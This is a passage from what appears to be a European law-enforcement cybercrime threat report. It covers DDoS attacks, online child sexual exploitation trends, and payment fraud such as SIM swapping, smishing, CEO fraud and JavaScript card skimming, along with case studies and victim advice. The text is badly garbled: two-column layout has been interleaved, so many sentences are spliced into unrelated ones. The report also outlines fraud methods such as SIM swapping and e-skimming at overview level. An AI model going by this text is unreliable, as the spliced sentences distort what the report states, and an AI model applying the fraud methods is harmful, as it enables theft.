stories in prevention, mitigation and investigation. measures. Instead of targeting high-value targets
Attackers have adapted to these security measures with massive volume attacks, attackers have shifted
by using attacks more efficiently, using both new tools their focus on smaller organisations with less mature
and reigniting old techniques, and targeting more security apparatus. Downscaling their targets enable
vulnerable victims. attackers to utilise volume more efficiently, and ensure
maximum payout when the attacks are financially
motivated. For example, private sector respondents
reported smaller volume attacks which are capable
Different types of attacks witnessed of blocking smaller data centres. Small requests from
Private sector and Member States respondents 700 IP addresses make it difficult to block against a
observed several phenomena relating to DDoS DDoS attack, and difficult for investigators to trace
attacks over the past year. Private sector respondents the attacker responsible as the attack comes from
reported seeing an increase in massive and simple multiple IP addresses. These attacks incorporated
DDoS attacks. European law enforcement did not additional methods which allowed the attackers to
witness significantly impactful attacks in 2019 but bypass the firewall’s operational capacity.
reported two kinds of attacks: targeted attacks which
aim to damage specific industries or information
systems; and crimes using automated tools.
Automated attacks have been growing over the past
year and are likely connected to CaaS. Threat actors
can purchase pre-existing automated tools and deploy
them for their own purpose, which makes conducting
a DDoS attack a relatively cheap and easy way of Law enforcement case study
carrying out an attack for threat actors who may have Law enforcement caught wind of a
limited skills or experience in engaging in cybercrime. DDoS attack targeting a Finnish-based
Moreover, criminals can use DDoS as a decoy or company. When approached by law
smokescreen for a more targeted attack. enforcement, however, the company did
not agree with the assessment, denying
Additionally, old DDoS methods are still prevalent.
they were under attack. The attackers
European law enforcement observed attacks
had used network mirroring DDoS via
targeting telecommunications and technology firms,
where, in some cases, DDoS attackers threatened the Finnish company to amplify their
companies with reputational harm and extorted them attack on a major casino service in
for payment. Law enforcement agencies also came Southern Europe, which was the real
across cases where threat actors engaged in small target of the attack. Law enforcement
attacks against larger organisations, extorting them thought that the Finnish company was
for money with the threat of conducting larger attacks. the target, however attackers were only
Some threat actors targeted public systems and utilising the company’s large network
websites with DDoS attacks, however, these attacks for mirroring and thus adding more
were difficult to attribute to anyone specifically. One volume to their actual DDoS attack.
reason for the change in DDoS attacks could be the This is an old technique which has
increase in protective measures used by organisations resurfaced after a few years, however
against them. with increased volume and capabilities.
European law enforcement observed a
With respect to 2020, Amazon said its Amazon Web
couple of these cases.
Services Shield service mitigated the largest DDoS
attack ever recorded, stopping at 2.3 terabyte attack in
February 202031.
IoT and DDoS The threat potential of DDoS attacks is

higher than its current impact in the EU
Connected devices, also known as the Internet of
Things (IoT), are an additional avenue for DDoS Private sector respondents raised the concern
attacks. According to private sector respondents, of threat actors targeting third-party service
connected devices which run on legacy operating providers with their attacks, for example energy and
systems or which have weak or non-existent telecommunication providers. If attackers managed to
password protection could be vulnerable to DDoS bring down organisations in these sectors, criminals
attacks or for criminals wanting to provide DDoS could potentially gain access to other valuable targets.
services for other criminals, particularly as connected Third-party service provider targeting could have
devices could be used for lateral movement to other significant knock-on and cascading impacts
infiltrate networks. Private sector respondents also in the supply chain. For example, the high level of
observed IoT botnets emerging, and while these have interconnectivity in the financial industry also makes it
been mostly experimental, not yet witnessed in use for vulnerable to disruptions.
specific scenarios, criminals may advertise these for
DDoS attacks.
_34 IOCTA 2020 3
3 CRIME PRIORITY
Child sexual exploitation online
KEY FINDINGS
• The amount of online market, pose a substantial • Livestreaming of child
CSAM detected continues risk for abuse and make sexual abuse continues
to increase, further it more difficult for law to increase and became
exacerbated by the enforcement to detect and even more prevalent during
COVID-19 crisis, which has investigate online CSE the COVID-19 crisis, a
serious consequences activities. recent case shows CSAM
for the capacity of law production also takes place
enforcement authorities.
• Online offender in the EU.
communities exhibit
• The use of encrypted considerable resilience and • The commercialisation of
chat apps and industry are continuously evolving. online CSE is becoming a
proposals to expand that more widespread issue.
Child sexual exploitation online IOCTA 2020 _35
3.1 INTRODUCTION
The main threats related to online CSE have

remained relatively stable over recent years
and throughout 2019. However, the COVID-19
pandemic has somewhat shifted this
assessment. Detection of online CSAM was
already increasing on a year-to-year basis, but
saw a sharp spike during the peak of the crisis.
A surge in the exchange of online CSAM occurred
during the contact and travel restrictions and
the consequences of this may have a long-term
impact on CSE in general.
_36 IOCTA 2020 Child sexual exploitation online
3.2 THE AMOUNT OF ONLINE CHILD SEXUAL ABUSE MATERIAL

CONTINUES TO INCREASE
The year-on-year increase of detected online CSAM States have reported an increase in detected CSAM
has continued. Law enforcement authorities in the activity on Peer-to-Peer (P2P) networks especially
EU see themselves confronted with an overwhelming in the second half of March, when lockdowns in EU
amount of online CSAM to the extent that it becomes Member States started materialising34.
unmanageable for many of the units dealing with
this crime. This includes regular complaints requiring The increase in online CSAM has serious
investigation, including production of CSAM through consequences for the capacity of law enforcement
rape and sexual assault, possession of that material, authorities to follow up and investigate reports of
grooming, sexual coercion and extortion, but also online CSE. Many investigators in EU Member States
referrals from the National Center for Missing and are faced on a daily basis with the task of making
Exploited Children (NCMEC), ISPs, and hotline impossible choices between investigating one report
reports. This ongoing increase reflects a continuous instead of another.
distribution and redistribution of CSAM content. The
There might be several reasons behind the growing
effect of this on victims is significant and ongoing32.
amount of detected CSAM, including more offenders
An international survey carried out by the Canadian
or better detection mechanisms. At least some of
Centre for Child Protection revealed that 70% of
the CSAM is being repeatedly uploaded and widely
victims feared being recognised in public as a result of
distributed. However, the harm resulting from being a
their involuntary participation in the offences against
victim of this is severe, as victims experience repeat
them33.
victimisation every time a picture or video is shared35.
The COVID-19 crisis revealed an extra surge in online
One of the drivers of the continuous growth of
distribution of CSAM. Referrals from the public, and
online CSAM is the growth in self-produced material.
industry in third-party countries reached record highs
Especially during COVID-19 related lockdowns,
during the peak months of the pandemic. EU Member
children spent more time online, sharing images
States also reported an increase in the number of
and videos that subsequently ended up with CSE
blocked attempts to access websites featuring CSAM
offenders.
during their lockdowns. Moreover, several EU Member
CHILD SEXUAL EXPLOITATION
Speculations amongst
offenders about online
activity of children Reports from the Volume of new posts in
public online forums
Downloads on P2P
sharing networks Attempts to initiate
online contact with
children
3.3 CRIMINALS INCREASINGLY

ENCRYPT THEIR
COMMUNICATIONS
COMPLICATING International police cooperation
INVESTIGATIONS leads to the arrest of a Darkweb
child sex abuser in Spain
The operation to bring down a child sex
Offenders keep using a number of ways to disguise
abuser, who had made explicit videos of
online CSAM, making it more complicated for law
an underage boy, owes its success to
enforcement authorities to detect such images
international cooperation. Information
and videos. Although P2P network sharing remains
from Queensland Police – Australia’s
among the most popular ways for perpetrators
Taskforce Argos sent via Europol’s secure
to share CSAM, it appears to be declining in
communication channel – allowed Europol
popularity. The use of proactive EMPACT preventive
experts to carry out operational analysis,
and educative campaigns such as Police2Peer36
seem to have had a continuing impact on which revealed that a video from 2015
reducing demand through these networks over found in Belgium and France may have
time. One-to-one distribution and sharing among been filmed in Spain.
larger groups routinely takes place on social The analysis of the images and video –
networking platforms and widely used encrypted which showed how the suspect abused a
communication applications such as WhatsApp, boy who was under five years old at the
a trend reflected by the increasing number of time – led the Spanish National Police to
referrals from US service providers via NCMEC37.
locate the suspect. When looking into the
message published with the video, officers
Increased encryption of many digital communi-
noticed that the suspect used words and
cation channels means it is becoming more and
phrases from Spain and not from a Latin
more challenging for law enforcement agencies to
American country.
investigate these crimes. There is increased activity
on encrypted communication platforms beyond Tor, Using operational analysis, open-source
making it difficult to detect and investigate online enquiries and cross-checking information,
CSE activities, including the creation and distribu- Europol experts found that the suspect
tion of material, online grooming, sexual coercion was registered on several websites and
and extortion. boards dedicated to child sexual abuse
and exploitation on the Darkweb. The
Perpetrators have been using encrypted communi- investigation revealed that the suspect
cations for a long time, but now even less tech-sav- was also using a social media network
vy offenders can easily use encryption. While the where he was in touch with a woman who
development of encrypted messaging platforms shared the same surname as the one in the
is not something bad in itself, it does raise signifi- title of the sexual abuse video.
cant obstacles for investigations in this crime type.
Once the abuser was located in Barcelona,
Additionally, the conversion of popular unencrypted
cybercrime experts from the Spanish
chat applications to encrypted status poses a sub-
National Police Central High-Tech Crime
stantial risk of increased abuse of those platforms
Unit located in Madrid moved to Barcelona.
for the exchange of CSAM and communication
Due to the lockdown in Spain, they were
between offenders38. Several platforms including
assisted remotely by other experts in
Facebook have reported a significant amount of
Madrid. The material seized showed how
CSAM. If these platforms move to implement end-
the arrested suspect was using several
to-end encryption for their messenger, concerns will
email addresses and Darkweb access
rise over their continued ability to identify CSAM on
points to commit this crime39.
their own platforms.
3.4 DARKWEB OFFENDER COMMUNITIES ARE

CONTINUOUSLY EVOLVING
Online offender communities exhibit considerable their abuse of children, encouraging others to abuse
resilience in response to operational activities and providing like-minded, technical and practical
carried out by law enforcement agencies, attacks by support to one another.
unidentified actors and losses of staff and platforms.
Their reactions include resurrecting old communities, Administrators require strict observance of the rules
establishing new communities, and making strong to avoid being banned from the forum. In addition,
efforts to organise and administer them. compliance with the rules and active participation can
lead to a progressive increase in rank. Users regularly
Parallel to the activity of large offender communities publish information and safety manuals aimed at
through Darknet forums is a development involving avoiding detection by law enforcement authorities.
smaller communities sharing CSAM directly with each Some users are also attentive to law enforcement
other via encrypted messaging platforms. Following operations and regularly publish news articles or
several high-profile law enforcement operations on even summary reports of the techniques used during
the Darkweb, many offenders seem to believe they successful operations. Cross-posting of such advice
are more secure in such small networks, sometimes across various boards and forums highlights a
based on invite-only. Offenders are also known to have collective approach to improve operational security
used encrypted communication channels to infiltrate for all. Some of these communities also meet offline,
existing child-aged groups and form break-off groups sometimes travelling great distances and bringing
involving children and adults40. physical hard drives as storage media with them.
Whereas Darkweb communities and real-life child
In response to law enforcement operations targeting sexual abusers used to be relatively separate, there
these Darkweb communities and due to the need appear to be more hands-on abusers – including
to select participants and ensure exchanges of individuals travelling for live distant child abuse
information are strictly related to child sexual abuse, – who are also very active on the Darkweb. Some
offenders tightly control their communities. They law enforcement agencies have had cases where
use Darkweb forums as meeting places where offenders keep material they produced themselves
participation is structured similarly to criminal with them for many years before uploading it to
organisations, with affiliation rules, codes of conduct, the internet, hoping to avoid victim identification.
division of tasks and strict hierarchies. The purpose This illustrates the crucial importance of victim
of the structure is to enforce rules and promote identification efforts by law enforcement agencies,
individuals based on their contribution to the such as the Victim Identification Taskforce (VIDTF)
community, which they do by recording and posting organised on a regular basis by Europol.
DARKWEB
Ninety suspects identified in major across Europe and beyond. The image and
online child sexual abuse operation video data seized during this investigation
has been used for Victim Identification Task
Police around the world have taken down a Forces hosted by Europol, through which
global child abuse ring with links to over forty seventy children and thirty suspects have
countries through a Belgian investigation been identified. The Belgian Federal Judicial
supported by Europol. Four suspects have Police succeeded in identifying 60 suspects
been convicted by a Belgian court. (of which 24 in Belgium) and 40 victims, which
This case was sparked by the Belgian East brings the actual total to ninety suspects and
Flanders Federal Judicial Police, after more 110 victims.
than nine million pictures and videos of the Some suspects have already appeared
abuse of thousands of children from around before court in a number of other countries.
the world were found there during a house In Australia, a suspect was sentenced to 15
search. years in prison.
The vast majority of this footage had never More arrests and rescues are expected
been seen in circulation before by law globally as police in over 40 countries
enforcement. Suspecting they were producing examine the intelligence packages compiled
their own, the Belgian investigators launched by Europol and information from the Belgian
operation Gargamel together with Europol Federal Judicial Police43.
3.5 LIVESTREAMING IS BECOMING MAINSTREAM
Livestreaming of child sexual abuse continues to confirmed that this type of online CSE is not limited
increase, becoming even more popular than usual to Southeast Asian countries. A large operation in
during the COVID-19 crisis, when travel restrictions Romania uncovered significant levels of livestreaming
prevented offenders from physically abusing taking place within the country, demonstrating that the
children41. As offenders had fewer opportunities to EU is not immune to this threat.
engage in physical CSE, live streaming emerged as
a viable alternative to hands-on child sexual abuse. In some cases, those seeking live streams of CSE are
In some cases, video chat applications with built-in deceived: they pay for a live stream, but never receive
payment systems are used. This is a complicated area anything.
for law enforcement investigations, as usually none
of the material is recorded, except for occasional chat
conversations.
The Philippines remains the main country where

live distant child abuse (LDCA) takes place. Cases
of online CSE in the Philippines surged during the
COVID-19 crisis, as the lockdown meant already poor
families struggled to generate income and children
did not go to school42. However, this year has further
3.6 COMMERCIALISATION OF ONLINE CSE IS AN

EMERGING THREAT
Last year’s IOCTA reported that commercialisation of monetise CSAM by uploading material to hosting
CSAM remained limited to LDCA44. However, the past sites (including legitimate hosting services) and
year has brought to light a number of indications that subsequently acquiring credit on the basis of the
the commercialisation of online CSE is becoming a number of downloads. This credit can be used to pay
more widespread issue. For a long time, online CSE for additional hosting or in some instances can be
was one of the few crime areas Europol focused cashed out, either in cryptocurrencies or other means.
on that was not primarily driven by financial gain. LDCA has had a commercial element for a longer
Although offenders are still primarily driven by a time, as offenders frequently pay to watch parents,
desire to obtain more CSAM, in some cases they do carers and offenders abuse children remotely to order.
seek to profit from online CSE. The emergence of a Uploading CSAM to legitimate hosting services is
profit-driven model in this crime area is a worrisome another method of monetising CSAM. The platform
development. used to download this material may not be aware of
the content or can claim not to be aware. The hosting
The monetisation of content has been seen on both site’s advertising and the potential profits per click are
the Clearnet and the Darknet, with many links on the also increased through such models.
dark web referring to Clearnet resources. Individuals
Games with
Sexual coercion Sexting gambling-like
and extortion elements
Making explicit Bullying

material
Accessing
pornography and
violent content
online
Unkn
own
num
ber
Costs of in-game
spending FRIEN
DS
Acce
p t
Decli
ne
Grooming
3.7 ONLINE CHILD SEXUAL ABUSE TO REMAIN

SIGNIFICANT THREAT
Online child sexual abuse remains a significant The growth in CSAM being detected is showing no
threat. The situation with COVID-19 has increased signs of stabilising, let alone decreasing. The end of the
the time people spend online, whether it is for remote current health crisis and the lifting of lockdown measures
working, remote schooling or spare time. Children may result in an increased number of reports of CSE,
who spend a lot of time online unsupervised are as abuse that occurred during the COVID-19 pandemic
therefore much more exposed to potential offenders may be reported to law enforcement or other authorities
through online gaming, the use of chat groups in apps, after the fact. It is highly likely that in the upcoming
phishing attempts via email, unsolicited contact on year there will be a sharp increase in the amount of
social media as well as through less secure online self-produced indecent material, which might also lead
educational applications45. Additionally, unsupervised to a corresponding increase in online solicitation and
time online further increases the risk of producing and exploitation.
distributing self-generated indecent material among
underage individuals, which could also eventually Travel restrictions and other measures during the
reach child sex offenders. Furthermore, child sex pandemic have likely prevented offenders from travelling
offenders could take advantage of lonely and isolated and so have shifted their focus further to the exchange
children online, connecting with them to produce of CSAM online. A relaxation of travel restrictions and
explicit material or to arrange a meeting in real life46. opening up of air travel will likely lead to an increase
The current situation regarding COVID-19 creates in transnational offenders seeking out CSE in certain
considerable levels of uncertainty and unpredictability countries and regions. If air travel remains limited for the
for the foreseeable future. The developments foreseeable future however, or becomes more expensive,
around the pandemic and related lockdowns and it is also possible we will see an increase in proxy
travel restrictions will have a big influence on the offending both with surrogates such as childlike sex dolls
developments regarding online CSE. or via live streaming.
_42 IOCTA 2020 4
4 CRIME PRIORITY
Payment fraud
KEY FINDINGS
• SIM swapping is a grown in sophistication, of losses and affecting

key trend that allows and become more targeted. thousands of victims from
perpetrators to take all EU countries.
over accounts and has
• Many law enforcement
demonstrated a steep rise
agencies and financial • CNP fraud continues to
services identified online increase as criminals
over the last year.
investment fraud as one diversify in terms of target
• BEC remains area of of the fastest-growing sectors and e-skimming
concern as it has increased, crimes, generating millions modi operandi.
Payment fraud IOCTA 2020 _43
4.1 INTRODUCTION
While the majority of fraud types are well known,

they enjoy continued success due to insufficient
cybersecurity measures and an overall lack of
awareness. Fuelled by a wealth of readily available
data, as well as a CaaS community, it has become
easier for criminals to carry out attacks. As a
result, law enforcement and industry continue to
identify well-established frauds such as BEC, as
a major threat but also witnessed new key trends
such as SIM swapping emerge.
_44 IOCTA 2020 Payment fraud
4.2 INCREASE IN SIM SWAPPING AND SMISHING
SIM swapping is one of the new key trends in

this year’s IOCTA. This modus operandi garnered
considerable attention over the past twelve months,
as law enforcement agencies noticed a significant
increase with a growing number of cases in Europe.
SIM swapping is a type of account takeover and Operation Quinientos Dusim47

refers to the circumvention of SMS-based 2FA to
access sensitive user accounts. Criminals fraudulently In January 2020, investigators from the
swap or port the victim’s SIM to one in the criminal’s Spanish National Police together with
possession in order to intercept the one time the Civil Guard and Europol targeted
password (OTP) step of the authentication process. suspects across Spain believed to be
Since this typically requires detailed information on part of a hacking ring which stole over
the victim, SIM swapping attacks are highly targeted. €3 million in a series of SIM swapping
This also means that the overall volume of cases attacks. Law enforcement arrested 12
differs from Member State to Member State, leading individuals in Benidorm (5), Granada (6)
to SIM swapping cases causing significantly higher and Valladolid (1).
losses in some jurisdictions while it is barely present
Composed of nationals between the
in others.
ages of 22 and 52 years old from Italy,
Overall, SIM swapping poses a significant concern Romania, Colombia and Spain, this
and huge potential danger and risk. A successful criminal gang struck over 100 times,
SIM swapping attack can lead to criminals gaining stealing between €6 000 and €137 000
complete control over a victim’s bank, email or social from bank accounts of unsuspecting
media account, and as a result, enable a number of victims per attack.
serious follow-up crimes.
The modus operandi was simple, yet
effective. The criminals managed to
obtain the online banking credentials
from the victims of the different banks
by through the use of banking Trojans or
other types of malware. Once they had
these credentials, the suspects would
apply for a duplicate of the SIM cards of
the victims, providing fake documents
to the mobile service providers. With
these duplicates in their possession, they
would receive the 2FA codes directly
to their phones send by the banks to
confirm the transfers.
The criminals then proceeded to make

fraudulent transfers from the victims’
accounts to money mule accounts used
to hide their traces. All this was done
in a very short period – between one or
two hours – which is the time it would
take for the victim to realise that his/her
phone number was no longer working.
Operation Smart Cash48 dozens of victims in Austria, in the spring of

2019 in a series of SIM swapping attacks.
An eight-month-long investigation between
the Romanian National Police and the Once having gained control over a victim’s
Austrian Criminal Intelligence Service with phone number, this particular gang would
the support of Europol has led to the arrest then use stolen banking credentials to
of 14 members of a crime gang who emptied log onto a mobile banking application to
bank accounts in Austria by gaining control introduce a withdrawal which they then
over their victims’ phone numbers. validated with an OTP sent by the bank via
SMS allowing them to withdraw money at
Law enforcement arrested the suspects
cardless ATMs.
earlier in February in Romania in
simultaneous warrants at their homes in It is estimated that this gang managed to
Bucharest (1), Constanta (5), Mures (6), Braila steal over half a million euros this way from
(1) and Sibiu (1). unsuspecting bank account owners.
The gang perpetrated the thefts, which netted
Similar to SIM swapping, SMishing

has seen an increase over the past
twelve months. SMishing refers
to the sending of fraudulent text
messages purporting to be from
trusted senders, typically targeting
financial institutions and their
customers.
SMishing is a lucrative alternative to

phishing by email for a number of
reasons. As most bank customers
receive the advice to be suspicious
of emails, customers do not yet have
the same level of scepticism towards
potentially fraudulent text messages.
In addition, it is difficult to impossible
for banks to protect their customers
from SMishing attacks, as criminals
aim to abuse the Alpha Tag of the
SMS thread and Signaling System 7
(SS7) vulnerabilities.
SIM SWAPPING – A MOBILE PHONE SCAM
SIM swapping occurs when a fraudster, using
social engineering techniques, takes control
over your mobile phone SIM card using your
stolen personal data.
HOW DOES IT WORK?

A fraudster obtains the victim’s personal data
through e.g. data breaches, phishing, social
media searches, malicious apps, online
With this information, the fraudster dupes the
shopping, malware, etc.
mobile phone operator into porting the victim's
mobile number to a SIM in his possession
ID CARD
The fraudster can now

receive incoming calls and
text messages, including
access to the victim’s online
banking
The victim will notice the mobile
phone lost service, and eventually
will discover they cannot log in to
their bank account
WHAT CAN YOU DO?

Keep your software updated, including your Buy from trusted sources. Check the ratings
browser, antivirus and operating system. of individual sellers.
Restrict information and show caution with Download apps only from official providers
regard to social media. and always read the apps permissions.
Never open suspicious links or When possible, do not associate your phone
attachments received by email or text number with sensitive online accounts.
message.
Set up your own PIN to restrict access to the
Do not reply to suspicious emails or SIM card. Do not share this PIN with anyone.
engage over the phone with callers that
request your personal information. Frequently check your financial statements.
Update your passwords regularly.
ARE YOU A VICTIM?

If your mobile phone loses reception If your service provider confirms
for no reason, report it immediately that your SIM has been swapped,
to your service provider. report it to the police.
Exploitation of 2FA behind smart ID to log in to their online bank accounts using
their smart ID, for instance to change their
Three EU Member States reported cases of
bank information. Following the link, they
SMishing. Criminals used SMishing to bypass
were then directed to fake bank log in account
the 2FA mechanism offered by national
pages, which would verify a fraudulent
smart IDs. Criminals aiming to attack bank
transaction initiated by the criminal after they
accounts and the respective national banking
attempted to log in. Alternatively, threat actors
infrastructure targeted these national Smart
would use this modus operandi to create
ID solutions through social engineering.
a new Smart ID account under the victim’s
Abusing alphanumeric SMS threads, criminals
name, but under full criminal control.
sent SMS appearing to come from the bank.
These text messages prompted the recipients
4.3 BUSINESS EMAIL COMPROMISE REMAINS A THREAT AND

GROWING AREA OF CONCERN
BEC remains a main and further growing threat originating from Eastern Europe, Nigeria and other
for law enforcement and private industry. BEC is African countries. The most sophisticated threat
a sophisticated scam targeting businesses and actors come from Israel.
organisations, whereby criminals employ social
engineering techniques to gain access to an
employee’s or executive’s email account to initiate
BEC has increased, grown in sophistication,
bank transfers under fraudulent conditions, i.e. by
and become more targeted
pretending to be the CEO and asking the employee to
carry out a payment. Over the past twelve months, BEC has increased
across most EU Member States, with an additional
BEC causes enormous losses and disruption to increase as a result of the global outbreak of
livelihoods and business operations49. Often following COVID-19. This increase in volume coincides with
spear phishing emails, BEC is highly tailored and very a growing sophistication and a more targeted
effective with targets ranging from governments, approach. Criminals make use of technically advanced
international organisations, small to large businesses measures, such as compromising bank accounts,
and individuals. identifying the ideal time to strike, managing email
conversations with complex man-in-the-middle
The two most common types of BEC are CEO fraud
attacks or even using Artificial Intelligence (AI) to
(criminals impersonating a high-level executive
mimic the voice of a company’s CEO50. The growing
requesting urgent bank transfers) and invoice
sophistication of BEC is also reflected in the
fraud (criminals impersonating suppliers asking
establishment and use of complex criminal networks,
for legitimate payments to be directed to a bank
which are used to launder the proceeds of the fraud.
account under the criminal’s control, or creating new,
Additionally, criminals have become better at local
fraudulent invoices).
languages and the exploitation of local contexts.
According to interviews with Member States, in many
While criminals target all kinds of organisations and
cases, BEC is carried out through a compromise
businesses, there is an increased focus on smaller
of email accounts hosted by Office 365, access to
companies, rather than just large corporations. As
which is typically gained through credential phishing
a result, even cybersecurity companies not usually
in advance to the fraud. This is often possible due to
dealing with BEC have been receiving requests for
limited security measures, such as a lack of 2FA; as
technical assistance, for instance to conduct forensic
well as a lack of awareness regarding spear phishing
investigations on the servers.
attempts. These type of attacks are still mostly
BANK SMISHING SMS

Smishing (a combination of the words
SMS and Phishing) is the attempt by
fraudsters to acquire personal,
financial or security information by
text message.
YOUR BANK
Due to the new rules we need

you to verify your bank account
details.
Please click here
http://yourbank.eu to verify
your details.
HOW DOES IT WORK?

The text message will typically ask you to
click on a link or call a phone number in order
to ‘verify’, ‘update’ or ‘reactivate’ your account.
But...the link leads to a bogus website and the
phone number leads to a fraudster pretending
to be the legitimate company.
WHAT CAN YOU DO?

Don’t click on links, attachments or images that you receive in unsolicited text
messages without first verifying the sender.
Don’t be rushed. Take your time and make the appropriate checks before
responding.
Never respond to a text message that requests your PIN or your online banking
password or any other security credentials.
If you think you might have responded to a smishing text and provided your
bank details, contact your bank immediately.
Criminals likely to abuse voice biometrics

In the future, law enforcement and industry expect to
see an increased use of voice biometrics to commit
impersonation fraud. While biometrics are currently
Industry case study working well, attempts to compromise them to get
A private sector partner reported a access to bank accounts for BEC are expected to
case in which a threat actor used proliferate as additional security measures are being
social engineering and blended implemented.
attacks to target the bank and its
corporate clients simultaneously. The
fraudster, having gained access to
the client’s email network, contacted
the bank to request a change of the
client’s beneficiary account. The
perpetrator subsequently managed
the conversation and information
exchange between the bank and the
corporate client at the same time.
Through this, the perpetrator showed
a thorough understanding of the
bank’s processes and knowledge of
who to speak to in order to change
the account.
Industry case study

One private sector partner
reported a case in which a criminal
impersonated its CEO while at a
conference. The threat actor made
initial contact through WhatsApp,
using a spoofed ID account and
picture of the CEO and subsequently
sent a forged email from the CEO
about an urgent acquisition. Using
information taken from open sources,
the attack was highly targeted and
convincing, demonstrating detailed
knowledge about the CEO’s current
whereabouts. The fraud – the
payment of an invoice, which never
existed – was stopped only at the last
moment, when a missing purchase
order number raised a red flag.
4.4 ONLINE INVESTMENT FRAUD DRAWS IN VICTIMS

ALL OVER EUROPE
Another relative ‘newcomer’ in this year’s IOCTA is In some cases, criminals have asked victims to
online investment fraud. Many law enforcement install RATs to take control over the target computer,
agencies and financial services identified online to initiate money transfers to criminals through full
investment fraud as one of the fastest-growing crimes control over the computer and bank account. In
of the past twelve months, generating millions of addition to eliciting money transfers from their victims,
losses and affecting thousands of victims from all EU criminals have also been seen to combine this type of
countries. Many Member States witnessed this type of fraud with phishing and the theft of credentials to be
fraud for the first time. used subsequently for additional fraud.
Online investment fraud refers to a fraud type whereby Criminals usually target victims through social media,
criminals aim to lure their victims into transferring using celebrities and fake versions of news outlets,
them money with appealing get-rich-quick schemes. or come across the fraudulent investment web sites
Offering commodities such as cryptocurrencies, via search engines. Criminals have also been seen
diamonds, or gold, criminals promise victims employing blended social engineering, with a mix of
extraordinary financial returns on their investments, SMishing, cold calling and other techniques. Often
while criminals keep victims engaged through these targets include older victims, who are less
websites showing fake investment returns. While technologically savvy.
online investment fraud usually accounts for mid-level
money losses, some victims have lost their entire life Online investment fraud is difficult to investigate, as
savings before realising that they had fallen victim to criminals set up complex international schemes of
a scam. companies with legal appearance, spanning across
several legal jurisdictions. The groups behind these
schemes are difficult to identify, due in part to their
use of anonymisation tools, spoofed phone numbers
Online investment fraud demonstrate high and legitimate-looking websites.
level of complexity
Given the fast rise of investment fraud in many EU
A number of online investment fraud cases have
Member States, law enforcement agencies expect this
shown a significant level of complexity, with large
type of fraud is to continue to increase and appear in
networks of shell companies and call centres behind
so far unaffected countries, too. Perpetrators generally
these schemes, as well as the development of
seem to originate from Russia, Ukraine and other
software and communication tactics to systematise
Eastern European countries
the exploitation of victims to their last cent.
4.5 CARD-NOT-PRESENT FRAUD CONTINUES TO

INCREASE AS CRIMINALS DIVERSIFY
CNP fraud, such as carding and e-skimming, has

increased over the past twelve months, with criminals
shifting to new sectors and employing novel modi
operandi.
Carding refers to the use of stolen card data to

Investigating carding on the dark
purchase goods or services. While carding has web
increased, criminals have moved away from targeting During the Carding Action Week at
the airline industry towards the accommodation and the end of 2018, the Hungarian police
rental sectors. The reduction in airline fraud is a direct launched an investigation into a vendor
result of successful public-private cooperation, which who was active on various markets
reduced the overall losses by nearly 50% and pushed offering card details from Hungarian
criminals to other sectors. This is in addition to the
cardholders.
purchase of goods such as mobile devices, phones
and electronics, which criminals bring in from other The vendor was using different Pretty
countries using compromised card details. Good Privacy (PGP) public keys on
the various market places but the
police were able to decode these keys.
This made it possible to identify the
vendor’s primary e-mail address used for
registration on these market places.
During the investigation, the police

were able to link the vendor’s activities
offering 400 account details from various
financial institutions including 198 Visa
accounts. Visa provided the necessary
evidence and law enforcement arrested
the vendor, and he is currently in custody
waiting for his trial. The cooperation
between the Hungarian Police and Visa
resulted in the saving of €227 286 of
potential fraud losses.
Criminals take the stolen card details from dark web
marketplaces (such as the Joker’s Stash51), which
make it increasingly easy to obtain stolen credentials
from specific forums. Since these Darkweb forums
typically require payment or some kind of interaction groups targeting e-commerce merchants with weak
in order to gain entry, access is often difficult for law security measures. While sometimes criminals are
enforcement to obtain. seen targeting bigger companies when they see
the opportunity, e-skimming mostly affects smaller
to medium-size merchants, who do not have the
capabilities to put into place sufficient protection and
who, as a result, are often compromised without being
E-commerce/digital skimming a low risk aware of the criminal activity taking place on their
and high-value modus operandi sites.
The compromise of card data through e-skimming
In an e-skimming attack, criminals inject malicious
(also referred to as digital skimming) has increased,
JavaScript code into the merchants’ checkout
with technically knowledgeable organised criminal
pages, which allows them to capture personal data
Spotlight: FIN6
FIN6 is a prolific group of criminals,
which has been targeting merchant point
of sale (POS) systems to gather payment
account data. In 2019, they expanded
their attacks to e-commerce merchants,
which represents a merger between CNP
fraud and e-commerce breaches. The
attackers injected malicious code into
the merchant’s websites, which would
and credit card credentials. The malicious code gather payment account number inputs
typically checks the various customer and payment and gather these account numbers into
account number inputs, exfiltrates the data to an an attacker-controlled C2 server. Other
attacker-controlled C&C server, following which skimmers have been observed gathering
criminals can use this information to commit other more input data than payment account
crimes. Criminals commonly exploit for example numbers, which puts users’ data at risk.
improperly configured cloud data repositories,
occasionally utilising automated processes to
target vulnerabilities. Other entry points that
criminals have increasingly been targeting include
e-commerce merchants directly, or their service
providers, which are supplying solutions ranging
from analytics and advertisements to other general Spotlight: Pipka
IT services.
Pipka is a new form of JavaScript
The most common type of e-skimming activity, skimmer which allows cybercriminals
which interviewees mentioned, relates to the use of to configure which form fields the
Magecart malware by organised criminal groups. programme will parse and extract,
This type of digital skimming has proven to be so including payment account numbers,
lucrative that many established cybercriminals expiration data, card verification values
have moved into conducting such attacks, with and the payment cardholder’s name
JavaScript-based skimming now considered one of and address. Pipka has the added
the main threats to financial institutions. feature of being able to remove its
malicious JavaScript component from
Private sector respondents have seen different
the Hypertext Markup Language (HTML)
variants of point of sale (POS) malware, including
code after successful execution. This
PwnPOS, AlinaPOS, and POSeidon / Backoff. FIN7
is a new development in JavaScript
and FIN8 have been active threat actors in this
skimming, and it adds interesting
area. FIN8 has also been observed using new
new layers to the malware. The Pipka
malware toolsets to target POS environments.
skimmer reflects advancements made
As with other cybercrime areas, e-skimming, too, in e-skimming, and it goes to show
has seen criminals coming up with novel technical that criminals targeting e-commerce
ways to execute their attacks, such as the Pipka will continue to develop innovative
malware. approaches to gather sensitive payment
account data.
Darkweb marketplaces enable increase of attacks, which is likely going to lead to a further
e-skimming increase in these types of attacks.
Dedicated forums give cybercriminals the possibility

to offload their stolen credit card data in a relatively
Digital fingerprints for sale
low risk and efficient way. The forums also provide
user-friendly interfaces for fraudsters seeking to Continuing innovative developments of recent years,
buy them. At the same time, CaaS has created a criminals are offering full digital user profiles in
competition between various underground forums, order to bypass advanced fraud prevention tools. In
where cybercriminals are offering their sniffers and keeping up with e-commerce merchants increasingly
skimmers with constantly improved capabilities. employing analytics checking a user’s identity
against device fingerprints and several other metrics,
criminals have moved to obtaining and selling these
E-skimming poses a significant challenge digital profiles to commit fraud. Taken from machines
to law enforcement and industry compromised in a botnet, they are used in order to
make purchases using the compromised computer
While it is an increasing threat causing significant pretending to be a returning customer, using the
